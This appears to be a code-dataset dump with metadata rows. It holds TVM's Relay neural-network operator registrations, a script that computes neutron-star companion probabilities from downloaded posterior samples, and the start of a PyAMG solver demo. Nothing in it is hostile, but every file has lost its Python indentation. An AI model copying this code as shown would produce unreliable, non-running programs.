gpl-3.0
| 4,548,903,236,749,104,000
| 43.995399
| 177
| 0.646965
| false
| 3.944736
| false
| false
| false
|
Huyuwei/tvm
|
python/tvm/relay/op/nn/_nn.py
|
1
|
26327
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
"""Backend compiler related feature registration"""
from __future__ import absolute_import
import topi
from topi.util import get_const_tuple
from .. import op as reg
from ..op import OpPattern, schedule_injective
# relu
reg.register_schedule("nn.relu", schedule_injective)
reg.register_pattern("nn.relu", OpPattern.ELEMWISE)
# softmax
@reg.register_schedule("nn.softmax")
def schedule_softmax(_, outputs, target):
"""Schedule definition of softmax"""
with target:
return topi.generic.schedule_softmax(outputs)
reg.register_pattern("nn.softmax", OpPattern.OPAQUE)
schedule_broadcast = schedule_injective
@reg.register_schedule("nn.log_softmax")
def schedule_log_softmax(_, outputs, target):
"""Schedule definition of log_softmax"""
with target:
return topi.generic.schedule_softmax(outputs)
reg.register_pattern("nn.log_softmax", OpPattern.OPAQUE)
# dense
@reg.register_compute("nn.dense")
def compute_dense(attrs, inputs, out_type, target):
"""Compute definition of dense"""
out_dtype = attrs.out_dtype
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
return [topi.nn.dense(inputs[0], inputs[1], None, out_dtype)]
@reg.register_schedule("nn.dense")
def schedule_dense(attrs, outputs, target):
"""Schedule definition of dense"""
with target:
return topi.generic.schedule_dense(outputs)
reg.register_pattern("nn.dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# batch_matmul
@reg.register_compute("nn.batch_matmul")
def compute_batch_matmul(attrs, inputs, out_type, target):
"""Compute definition of batch_matmul"""
with target:
return [topi.nn.batch_matmul(inputs[0], inputs[1])]
@reg.register_schedule("nn.batch_matmul")
def schedule_batch_matmul(attrs, outputs, target):
"""Schedule definition of batch_matmul"""
with target:
return topi.generic.schedule_batch_matmul(outputs)
reg.register_pattern("nn.batch_matmul", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_dense
@reg.register_compute("nn.sparse_dense")
def compute_sparse_dense(attrs, inputs, out_type, target):
"""Compute definition of sparse_dense"""
return [topi.nn.sparse_dense(inputs[0], inputs[1], inputs[2], inputs[3])]
@reg.register_schedule("nn.sparse_dense")
def schedule_sparse_dense(attrs, outputs, target):
"""Schedule definition of batch_matmul"""
with target:
return topi.generic.schedule_sparse_dense(outputs)
reg.register_pattern("nn.sparse_dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_transpose
@reg.register_compute("nn.sparse_transpose")
def compute_sparse_transpose(attrs, inputs, out_type, target):
"""Compute definition of sparse_transpose"""
return topi.nn.sparse_transpose(inputs[0], inputs[1], inputs[2])
@reg.register_schedule("nn.sparse_transpose")
def schedule_sparse_transpose(attrs, outputs, target):
"""Schedule definition of batch_matmul"""
with target:
return topi.generic.schedule_sparse_transpose(outputs)
reg.register_pattern("nn.sparse_transpose", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d
def _find_conv2d_op(op):
"""Find the op with conv2d in its tag by traversing."""
if 'conv2d' in op.tag:
return op
for tensor in op.input_tensors:
op_ = _find_conv2d_op(tensor.op)
if op_ is not None:
return op_
return None
@reg.register_compute("nn.conv2d")
def compute_conv2d(attrs, inputs, out_type, target):
"""Compute definition of conv2d"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
groups = attrs.groups
layout = attrs.data_layout
kernel_layout = attrs.kernel_layout
out_dtype = attrs.out_dtype
out_dtype = (inputs[0].dtype if out_dtype in ("same", "")
else out_dtype)
assert layout in ["NCHW", "NHWC", "NCHW4c"]
(dilation_h, dilation_w) = dilation
if dilation_h < 1 or dilation_w < 1:
raise ValueError("dilation should be positive value")
def _get_out_depth():
weight_shape = get_const_tuple(inputs[1].shape)
if kernel_layout == "HWOI":
return weight_shape[2] * weight_shape[3]
return weight_shape[0] * weight_shape[1]
if groups == 1:
out = topi.nn.conv2d(
inputs[0], inputs[1], strides, padding,
dilation, layout, out_dtype)
elif layout == "NCHW" and _get_out_depth() == groups:
out = topi.nn.depthwise_conv2d_nchw(
inputs[0], inputs[1], strides, padding, dilation, out_dtype)
elif layout == "NHWC" and kernel_layout == "HWOI" and _get_out_depth() == groups:
out = topi.nn.depthwise_conv2d_nhwc(
inputs[0], inputs[1], strides, padding, dilation, out_dtype)
elif layout in ['NCHW', 'NCHW4c']:
out = topi.nn.group_conv2d_nchw(inputs[0], inputs[1], strides, padding, dilation, groups,
out_dtype)
else:
raise ValueError("not support arbitrary group number for now")
return [out]
@reg.register_schedule("nn.conv2d")
def schedule_conv2d(attrs, outs, target):
"""Schedule definition of conv2d"""
groups = attrs.groups
layout = attrs.data_layout
kernel_layout = attrs.kernel_layout
with target:
if groups == 1 and layout == "NCHW":
return topi.generic.schedule_conv2d_nchw(outs)
if groups == 1 and layout == "NCHW4c":
return topi.generic.schedule_conv2d_nchw(outs)
if groups == 1 and layout == "NHWC":
return topi.generic.schedule_conv2d_nhwc(outs)
if groups != 1:
# collect in_channels to distinguish depthwise and group conv2d
op = _find_conv2d_op(outs[0].op)
assert op is not None
is_depthwise = 'depthwise' in op.tag
if is_depthwise:
if layout == "NCHW":
# TODO(leyuan, merrymercy, Huyuwei): fold depthwise topi into conv2d.
return topi.generic.schedule_depthwise_conv2d_nchw(outs)
if layout == "NHWC" and kernel_layout == "HWOI":
return topi.generic.schedule_depthwise_conv2d_nhwc(outs)
else:
if layout in ["NCHW", "NCHW4c"]:
return topi.generic.schedule_group_conv2d_nchw(outs)
raise ValueError("No compatible schedule")
@reg.register_alter_op_layout("nn.conv2d")
def alter_op_layout_conv2d(attrs, inputs, tinfos):
"""Alternate the layout of conv2d"""
from ... import op
return topi.nn.conv2d_alter_layout(attrs, inputs, tinfos, op)
@reg.register_legalize("nn.conv2d")
def legalize_conv2d(attrs, inputs, types):
"""Legalize conv2d op.
Parameters
----------
attrs : tvm.attrs.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.conv2d_legalize(attrs, inputs, types)
reg.register_pattern("nn.conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d_transpose
@reg.register_compute("nn.conv2d_transpose")
def compute_conv2d_transpose(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_transpose"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
groups = attrs.groups
layout = attrs.data_layout
out_dtype = attrs.out_dtype
out_dtype = (inputs[0].dtype if out_dtype in ("same", "")
else out_dtype)
assert layout == "NCHW", "only support nchw for now"
assert dilation == (1, 1), "not support dilate now"
assert groups == 1, "only support groups == 1 for now"
out = topi.nn.conv2d_transpose_nchw(
inputs[0], inputs[1], strides, padding, out_dtype)
output_padding = get_const_tuple(attrs.output_padding)
out = topi.nn.pad(out,
[0, 0, 0, 0], [0, 0, output_padding[0], output_padding[1]])
return [out]
@reg.register_schedule("nn.conv2d_transpose")
def schedule_conv2d_transpose(attrs, outs, target):
"""Schedule definition of conv2d_transpose"""
with target:
return topi.generic.schedule_conv2d_transpose_nchw(outs)
reg.register_pattern("nn.conv2d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
# bias_add
reg.register_schedule("nn.bias_add", schedule_injective)
reg.register_pattern("nn.bias_add", OpPattern.BROADCAST)
# max_pool2d
@reg.register_schedule("nn.max_pool2d")
def schedule_max_pool2d(attrs, outs, target):
"""Schedule definition of max_pool2d"""
layout = attrs.layout
with target:
return topi.generic.schedule_pool(outs, layout)
reg.register_pattern("nn.max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d
@reg.register_schedule("nn.avg_pool2d")
def schedule_avg_pool2d(attrs, outs, target):
"""Schedule definition of avg_pool2d"""
layout = attrs.layout
with target:
return topi.generic.schedule_pool(outs, layout)
reg.register_pattern("nn.avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# max_pool2d_grad
@reg.register_schedule("nn.max_pool2d_grad")
def schedule_max_pool2d_grad(attrs, outs, target):
"""Schedule definition of max_pool2d_grad"""
with target:
return topi.generic.schedule_pool_grad(outs)
reg.register_pattern("nn.max_pool2d_grad", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d_grad
@reg.register_schedule("nn.avg_pool2d_grad")
def schedule_avg_pool2d_grad(attrs, outs, target):
"""Schedule definition of avg_pool2d_grad"""
with target:
return topi.generic.schedule_pool_grad(outs)
reg.register_pattern("nn.avg_pool2d_grad", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_max_pool2d
@reg.register_schedule("nn.global_max_pool2d")
def schedule_global_max_pool2d(_, outs, target):
"""Schedule definition of global_max_pool2d"""
with target:
return topi.generic.schedule_adaptive_pool(outs)
reg.register_pattern("nn.global_max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_avg_pool2d
@reg.register_schedule("nn.global_avg_pool2d")
def schedule_global_avg_pool2d(_, outs, target):
"""Schedule definition of global_avg_pool2d"""
with target:
return topi.generic.schedule_adaptive_pool(outs)
reg.register_pattern("nn.global_avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# leaky_relu
reg.register_schedule("nn.leaky_relu", schedule_broadcast)
reg.register_pattern("nn.leaky_relu", OpPattern.ELEMWISE)
# prelu
reg.register_schedule("nn.prelu", schedule_broadcast)
reg.register_pattern("nn.prelu", OpPattern.BROADCAST)
# flatten
reg.register_schedule("nn.batch_flatten", schedule_broadcast)
reg.register_pattern("nn.batch_flatten", OpPattern.INJECTIVE)
# lrn
@reg.register_compute("nn.lrn")
def compute_lrn(attrs, inputs, out_dtype, target):
"""Compute definition of lrn"""
assert len(inputs) == 1
return [topi.nn.lrn(inputs[0], attrs.size, attrs.axis,
attrs.alpha, attrs.beta, attrs.bias)]
@reg.register_schedule("nn.lrn")
def schedule_lrn(attrs, outs, target):
"""Schedule definition of lrn"""
with target:
return topi.generic.schedule_lrn(outs)
reg.register_pattern("nn.lrn", OpPattern.OPAQUE)
# l2_normalize
@reg.register_compute("nn.l2_normalize")
def compute_l2_normalize(attrs, inputs, out_dtype, target):
"""Compute definition of l2 normalize"""
return [topi.nn.l2_normalize(inputs[0], attrs.eps, attrs.axis)]
@reg.register_schedule("nn.l2_normalize")
def schedule_l2_normalize(attrs, outs, target):
"""Schedule definition of l2 normalize"""
with target:
return topi.generic.schedule_l2_normalize(outs)
reg.register_pattern("nn.l2_normalize", OpPattern.OUT_ELEMWISE_FUSABLE)
# upsampling
reg.register_schedule("nn.upsampling", reg.schedule_injective)
def schedule_upsampling(_, outs, target):
"""Schedule definition of upsampling"""
with target:
return topi.generic.schedule_injective(outs)
@reg.register_compute("nn.upsampling")
def compute_upsampling(attrs, inputs, out_dtype, target):
scale = attrs.scale
layout = attrs.layout
method = attrs.method
align_corners = attrs.align_corners
return [topi.nn.upsampling(inputs[0], scale, layout, method, align_corners)]
# pad
reg.register_schedule("nn.pad", schedule_broadcast)
# mirror_pad
reg.register_schedule("nn.mirror_pad", schedule_broadcast)
@reg.register_compute("nn.mirror_pad")
def compute_mirror_pad(attrs, inputs, out_dtype, target):
pad_before, pad_after = list(zip(*attrs.pad_width))
mode = attrs.mode
out = topi.nn.mirror_pad(inputs[0], pad_before=pad_before, pad_after=pad_after, mode=mode)
return [out]
# winograd related operators
@reg.register_compute("nn.contrib_conv2d_winograd_without_weight_transform")
def compute_contrib_conv2d_winograd_without_weight_transform(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_winograd_without_weight_transform"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
groups = attrs.get_int("groups")
data_layout = attrs.get_str("data_layout")
out_dtype = attrs.get_str("out_dtype")
tile_size = attrs.get_int("tile_size")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
assert dilation == (1, 1), "Do not support dilate now"
assert groups == 1, "Do not supoort arbitrary group number"
out = topi.nn.conv2d_winograd_without_weight_transform(
inputs[0], inputs[1], strides, padding, dilation, data_layout,
out_dtype, tile_size)
return [out]
@reg.register_schedule("nn.contrib_conv2d_winograd_without_weight_transform")
def schedule_contrib_conv2d_winograd_without_weight_transform(attrs, outs, target):
"""Schedule definition of conv2d_winograd_without_weight_transform"""
with target:
return topi.generic.schedule_conv2d_winograd_without_weight_transform(outs)
reg.register_pattern("nn.contrib_conv2d_winograd_without_weight_transform",
OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_conv2d_winograd_weight_transform")
def compute_contrib_conv2d_winograd_weight_transform(attrs, inputs, out_dtype, target):
"""Compute definition of contrib_conv2d_winograd_weight_transform"""
out = topi.nn.conv2d_winograd_weight_transform(
inputs[0], attrs.get_int('tile_size'))
return [out]
@reg.register_schedule("nn.contrib_conv2d_winograd_weight_transform")
def schedule_contrib_conv2d_winograd_weight_transform(attrs, outs, target):
"""Schedule definition of contrib_conv2d_winograd_weight_transform"""
with target:
return topi.generic.schedule_conv2d_winograd_weight_transform(outs)
reg.register_pattern("nn.contrib_conv2d_winograd_weight_transform",
OpPattern.OUT_ELEMWISE_FUSABLE)
# winograd nnpack related operators
@reg.register_compute("nn.contrib_conv2d_winograd_nnpack_without_weight_transform")
def compute_contrib_conv2d_winograd_nnpack_without_weight_transform(
attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_winograd_nnpack_without_weight_transform"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
groups = attrs.get_int("groups")
data_layout = attrs.get_str("data_layout")
out_dtype = attrs.get_str("out_dtype")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
assert dilation == (1, 1), "Do not support dilate now"
assert groups == 1, "Do not supoort arbitrary group number"
# No bias
out = topi.nn.conv2d_winograd_nnpack_without_weight_transform(
inputs[0], inputs[1], None, strides, padding, dilation, data_layout,
out_dtype)
return [out]
@reg.register_schedule("nn.contrib_conv2d_winograd_nnpack_without_weight_transform")
def schedule_contrib_conv2d_winograd_nnpack_without_weight_transform(attrs, outs, target):
"""Schedule definition of conv2d_winograd_nnpack_without_weight_transform"""
with target:
return topi.generic.schedule_conv2d_winograd_nnpack_without_weight_transform(outs)
reg.register_pattern("nn.contrib_conv2d_winograd_nnpack_without_weight_transform",
OpPattern.OPAQUE)
@reg.register_compute("nn.contrib_conv2d_winograd_nnpack_weight_transform")
def compute_contrib_conv2d_winograd_nnpack_weight_transform(attrs, inputs, out_dtype, target):
"""Compute definition of contrib_conv2d_winograd_nnpack_weight_transform"""
convolution_algorithm = attrs.get_int('convolution_algorithm')
out = topi.nn.conv2d_winograd_nnpack_weight_transform(
inputs[0], convolution_algorithm, out_dtype)
return [out]
@reg.register_schedule("nn.contrib_conv2d_winograd_nnpack_weight_transform")
def schedule_contrib_conv2d_winograd_nnpack_weight_transform(attrs, outs, target):
"""Schedule definition of contrib_conv2d_winograd_nnpack_weight_transform"""
with target:
return topi.generic.schedule_conv2d_winograd_nnpack_weight_transform(outs)
reg.register_pattern("nn.contrib_conv2d_winograd_nnpack_weight_transform",
OpPattern.OPAQUE)
@reg.register_compute("nn.contrib_conv2d_NCHWc")
def compute_contrib_conv2d_NCHWc(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d NCHWc"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
data_layout = attrs.get_str("data_layout")
out_layout = attrs.get_str("out_layout")
out_dtype = attrs.get_str("out_dtype")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
out = topi.nn.conv2d_NCHWc(inputs[0], inputs[1], strides, padding, dilation,
data_layout, out_layout, out_dtype)
return [out]
@reg.register_schedule("nn.contrib_conv2d_NCHWc")
def schedule_contrib_conv2d_NCHWc(attrs, outs, target):
"""Schedule definition of contrib_conv2d_NCHWc"""
with target:
return topi.generic.schedule_conv2d_NCHWc(outs)
reg.register_pattern("nn.contrib_conv2d_NCHWc",
OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_conv2d_NCHWc_int8")
def compute_contrib_conv2d_NCHWc_int8(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d NCHWc"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
data_layout = attrs.get_str("data_layout")
out_layout = attrs.get_str("out_layout")
out_dtype = attrs.get_str("out_dtype")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
out = topi.nn.conv2d_NCHWc_int8(inputs[0], inputs[1], strides, padding, dilation,
data_layout, out_layout, out_dtype)
return [out]
@reg.register_schedule("nn.contrib_conv2d_NCHWc_int8")
def schedule_contrib_conv2d_NCHWc_int8(attrs, outs, target):
"""Schedule definition of contrib_conv2d_NCHWc_int8"""
with target:
return topi.generic.schedule_conv2d_NCHWc_int8(outs)
reg.register_pattern("nn.contrib_conv2d_NCHWc_int8",
OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_depthwise_conv2d_NCHWc")
def compute_contrib_depthwise_conv2d_NCHWc(attrs, inputs, out_dtype, target):
"""Compute definition of depthwise conv2d NCHWc"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
data_layout = attrs.get_str("data_layout")
out_layout = attrs.get_str("out_layout")
out_dtype = attrs.get_str("out_dtype")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
out = topi.nn.depthwise_conv2d_NCHWc(inputs[0], inputs[1], strides, padding, dilation,
data_layout, out_layout, out_dtype)
return [out]
@reg.register_schedule("nn.contrib_depthwise_conv2d_NCHWc")
def schedule_contrib_depthwise_conv2d_NCHWc(attrs, outs, target):
"""Schedule definition of contrib_conv2d_NCHWc"""
with target:
return topi.generic.schedule_depthwise_conv2d_NCHWc(outs)
reg.register_pattern("nn.contrib_depthwise_conv2d_NCHWc",
OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.deformable_conv2d")
def compute_deformable_conv2d(attrs, inputs, out_dtype, target):
"""Compute definition of deformable_conv2d"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
deformable_groups = attrs.deformable_groups
groups = attrs.groups
out_dtype = attrs.out_dtype
out_dtype = inputs[0].dtype if out_dtype in ("same", "") else out_dtype
with target:
out = topi.nn.deformable_conv2d_nchw(inputs[0], inputs[1], inputs[2], strides, padding,
dilation, deformable_groups, groups, out_dtype)
return [out]
@reg.register_schedule("nn.deformable_conv2d")
def schedule_deformable_conv2d(attrs, outs, target):
"""Schedule definition of deformable_conv2d"""
with target:
return topi.generic.schedule_deformable_conv2d_nchw(outs)
reg.register_pattern("nn.deformable_conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.bitpack")
def compute_bitpack(attrs, inputs, out_dtype, target):
"""Compute definition for bitpack"""
bits = attrs.bits
pack_axis = attrs.pack_axis
bit_axis = attrs.bit_axis
pack_type = attrs.pack_type
name = attrs.name
with target:
out = topi.nn.bitpack(inputs[0], bits, pack_axis, bit_axis, pack_type,
name)
return [out]
@reg.register_schedule("nn.bitpack")
def schedule_bitpack(attrs, outs, target):
with target:
return topi.generic.schedule_bitpack(outs)
reg.register_pattern("nn.bitpack", OpPattern.INJECTIVE)
@reg.register_compute("nn.bitserial_conv2d")
def compute_bitserial_conv2d(attrs, inputs, out_dtype, target):
"""Compute definition for bitserial conv2d."""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
activation_bits = attrs.activation_bits
weight_bits = attrs.weight_bits
layout = attrs.data_layout
pack_dtype = attrs.pack_dtype
out_dtype = attrs.out_dtype
unipolar = attrs.unipolar
if layout == 'NCHW':
with target:
out = topi.nn.bitserial_conv2d_nchw(
inputs[0], inputs[1], strides, padding, activation_bits,
weight_bits, pack_dtype, out_dtype, unipolar)
elif layout == 'NHWC':
with target:
out = topi.nn.bitserial_conv2d_nhwc(
inputs[0], inputs[1], strides, padding, activation_bits,
weight_bits, pack_dtype, out_dtype, unipolar)
else:
raise ValueError("Data layout not supported.")
return [out]
@reg.register_schedule("nn.bitserial_conv2d")
def schedule_bitserial_conv2d(attrs, outs, target):
"""Schedule definition for bitserial conv2d."""
layout = attrs.data_layout
if layout == 'NCHW':
with target:
return topi.generic.schedule_bitserial_conv2d_nchw(outs)
elif layout == 'NHWC':
with target:
return topi.generic.schedule_bitserial_conv2d_nhwc(outs)
else:
raise ValueError("Data layout not supported.")
@reg.register_legalize("nn.bitserial_conv2d")
def legalize_bitserial_conv2d(attrs, inputs, types):
"""Legalize bitserial_conv2d op.
Parameters
----------
attrs : tvm.attrs.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.bitserial_conv2d_legalize(attrs, inputs, types)
reg.register_pattern("nn.bitserial_conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# bitserial_dense
@reg.register_compute("nn.bitserial_dense")
def compute_bitserial_dense(attrs, inputs, out_type, target):
"""Compute definition of bitserial_dense"""
data_bits = attrs.data_bits
weight_bits = attrs.weight_bits
pack_dtype = attrs.pack_dtype
out_dtype = attrs.out_dtype
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
unipolar = attrs.unipolar
return [
topi.nn.bitserial_dense(
inputs[0],
inputs[1],
data_bits,
weight_bits,
pack_dtype,
out_dtype,
unipolar)
]
@reg.register_schedule("nn.bitserial_dense")
def schedule_bitserial_dense(attrs, outputs, target):
"""Schedule definition of bitserial_dense"""
with target:
return topi.generic.schedule_bitserial_dense(outputs)
reg.register_pattern("nn.bitserial_dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
|
apache-2.0
| -8,713,760,548,054,790,000
| 34.243641
| 97
| 0.685722
| false
| 3.330424
| false
| false
| false
|
adrn/tilt-shift
|
scripts/companion.py
|
1
|
5554
|
# coding: utf-8
from __future__ import division, print_function
__author__ = "adrn <adrn@astro.columbia.edu>"
# Standard library
import os
import sys
import urllib2
import warnings
# Third-party
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import truncnorm, scoreatpercentile
# Neutron star distribution properties (fixed)
bounds_NS = (1.3, 2.) # Msun
mean_NS = 1.4 # Msun
stddev_NS = 0.05 # Msun
# White dwarf mass bounds
bounds_WD = (0.2, 1.44)
# Number of steps to use in numerical integration below
Nintegrate = 4096
def integrand_factor(m2, mf, m1):
""" Compute the factor multiplying p(M_2|θ) in the integral of Equation XXX in the paper """
mtot = m1 + m2
return mtot**(4/3.) * mf**(-1/3.) / m2 / np.sqrt(m2**2 - (mf*mtot**2)**(2/3.)) / 3.
def m2_func(p, mf, m1, bounds_WD, m2s):
mean_WD,stddev_WD,f_NS = p
# White dwarf companion mixture component
lower, upper = bounds_WD
dist_WD = truncnorm((lower - mean_WD) / stddev_WD, (upper - mean_WD) / stddev_WD, loc=mean_WD, scale=stddev_WD)
# Neutron star companion mixture component
lower, upper = bounds_NS
dist_NS = truncnorm((lower - mean_NS) / stddev_NS, (upper - mean_NS) / stddev_NS, loc=mean_NS, scale=stddev_NS)
p_WD = (1-f_NS) * dist_WD.pdf(m2s)
p_NS = f_NS * dist_NS.pdf(m2s)
return p_WD + p_NS
def likelihood(p, mf, m1, bounds_WD):
mean_WD,stddev_WD,f_NS = p
m2s = np.linspace(0., 2., Nintegrate)
dm2 = m2s[1] - m2s[0]
integ_fac = integrand_factor(m2s, mf, m1)
# White dwarf companion mixture component
lower, upper = bounds_WD
dist_WD = truncnorm((lower - mean_WD) / stddev_WD, (upper - mean_WD) / stddev_WD, loc=mean_WD, scale=stddev_WD)
# Neutron star companion mixture component
lower, upper = bounds_NS
dist_NS = truncnorm((lower - mean_NS) / stddev_NS, (upper - mean_NS) / stddev_NS, loc=mean_NS, scale=stddev_NS)
p_WD = (1-f_NS) * dist_WD.pdf(m2s)
p_NS = f_NS * dist_NS.pdf(m2s)
# Zero out when evaluating outside of allowed bounds (normally NaN)
integ_fac[np.isnan(integ_fac)] = 0.
p_WD[np.isnan(p_WD)] = 0.
p_NS[np.isnan(p_NS)] = 0.
# we approximate the integral using the trapezoidal rule
integrand_WD = p_WD * integ_fac
integrand_NS = p_NS * integ_fac
p_WD = dm2/2. * (integrand_WD[0] + np.sum(2*integrand_WD[1:-1], axis=0) + integrand_WD[-1])
p_NS = dm2/2. * (integrand_NS[0] + np.sum(2*integrand_NS[1:-1], axis=0) + integrand_NS[-1])
return np.vstack((p_WD, p_NS))
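# --- Editor's hedged sanity check (illustrative addition, not part of the
# original script): the manual sums above implement the composite trapezoidal
# rule, integral ≈ dx/2 * (f[0] + 2*f[1] + ... + 2*f[n-2] + f[n-1]), which on a
# uniform grid agrees with numpy.trapz.  The values below are made up purely to
# demonstrate the equivalence.
_xs = np.linspace(0., 1., 5)
_fs = _xs**2
_manual = (_xs[1] - _xs[0])/2. * (_fs[0] + np.sum(2*_fs[1:-1]) + _fs[-1])
assert np.allclose(_manual, np.trapz(_fs, _xs))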
def main(m1, mf, nsamples):
file_url = "http://files.figshare.com/1720018/posterior_samples.txt"
cache_path = "data"
local_file = os.path.join(cache_path, "posterior_samples.txt")
if not os.path.exists(cache_path):
os.mkdir(cache_path)
if not os.path.exists(local_file):
print("Posterior sample file doesn't exist locally.")
print("Downloading and caching to: {}".format(os.path.abspath(local_file)))
# download and save
f = urllib2.urlopen(file_url)
with open(local_file, 'w') as f2:
f2.write(f.read())
else:
print("Reading cached file from: {}".format(os.path.abspath(local_file)))
samples = np.genfromtxt(local_file, delimiter=',', names=True)
m2s = np.linspace(0, 2., 50)
p_m2s = np.zeros((nsamples, len(m2s)))
P_NS = np.zeros(nsamples)
for i,p in enumerate(samples[:nsamples]):
p_WD,p_NS = likelihood(p, mf, m1, bounds_WD)[:,0]
P_NS[i] = p_NS / (p_WD + p_NS)
p_m2s[i] = integrand_factor(m2s, mf, m1) * m2_func(p, mf, m1, bounds_WD, m2s)
fig,axes = plt.subplots(2,1,figsize=(10,12))
binw = 3.5*np.std(P_NS) / len(P_NS)**(1/3.)
axes[0].hist(P_NS, bins=np.arange(0.,1.+binw,binw), normed=True)
axes[0].set_xlabel(r"$P_{\rm NS}$")
axes[0].axvline(np.mean(P_NS), alpha=0.5, lw=2., color='g')
axes[0].axvline(scoreatpercentile(P_NS,16), alpha=0.5, lw=2., color='g', linestyle='dashed')
axes[0].axvline(scoreatpercentile(P_NS,84), alpha=0.5, lw=2., color='g', linestyle='dashed')
axes[0].set_xlim(0,max(P_NS)+0.05)
axes[1].errorbar(m2s, np.mean(p_m2s,axis=0), np.std(p_m2s,axis=0),
marker='o', ecolor='#666666')
# for i in np.random.randint(0,nsamples,100):
# axes[1].plot(m2s, p_m2s[i], marker=None, lw=2., color='#666666', alpha=0.25)
# axes[1].plot(m2s, np.mean(p_m2s,axis=0), marker=None, lw=2., color='k')
axes[1].set_xlabel(r"${\rm M}_2 [{\rm M}_\odot]$")
print("Mean P_NS: {:.3f}".format(np.mean(P_NS)))
print("Std. deviation P_NS: {:.3f}".format(np.std(P_NS)))
print("Median P_NS: {:.3f}".format(np.median(P_NS)))
print("16th percentile P_NS: {:.3f}".format(scoreatpercentile(P_NS,16)))
print("84th percentile P_NS: {:.3f}".format(scoreatpercentile(P_NS,84)))
plt.show()
if __name__ == '__main__':
from argparse import ArgumentParser
# Define parser object
parser = ArgumentParser(description="")
parser.add_argument("--m1", dest="m1", default=None, required=True,
type=float, help="Mass of the primary.")
parser.add_argument("--mf", dest="mf", default=None, required=True,
type=float, help="Mass function.")
parser.add_argument("--nsamples", dest="nsamples", default=1000,
type=int, help="Number of posterior samples to use.")
args = parser.parse_args()
warnings.simplefilter("ignore", RuntimeWarning)
main(args.m1, args.mf, nsamples=args.nsamples)
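# --- Editor's hedged usage note (argument values are illustrative only): the
# script is driven from the command line with the flags defined above, e.g.
#     python companion.py --m1 1.0 --mf 0.3 --nsamples 500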
|
mit
| 9,173,242,311,238,589,000
| 34.14557
| 115
| 0.618585
| false
| 2.751734
| false
| false
| false
|
pombreda/pyamg
|
pyamg/gallery/demo.py
|
1
|
2087
|
"""Basic PyAMG demo showing AMG standalone convergence versus preconditioned CG
with AMG"""
__docformat__ = "restructuredtext en"
__all__ = ['demo']
import scipy
import numpy
from pyamg.gallery import poisson
from pyamg.aggregation import smoothed_aggregation_solver
def demo():
A = poisson((100,100), format='csr') # 2D FD Poisson problem
B = None # no near-null spaces guesses for SA
b = scipy.rand(A.shape[0],1) # a random right-hand side
# Construct solver using AMG based on Smoothed Aggregation (SA) and display info
mls = smoothed_aggregation_solver(A, B=B)
print mls
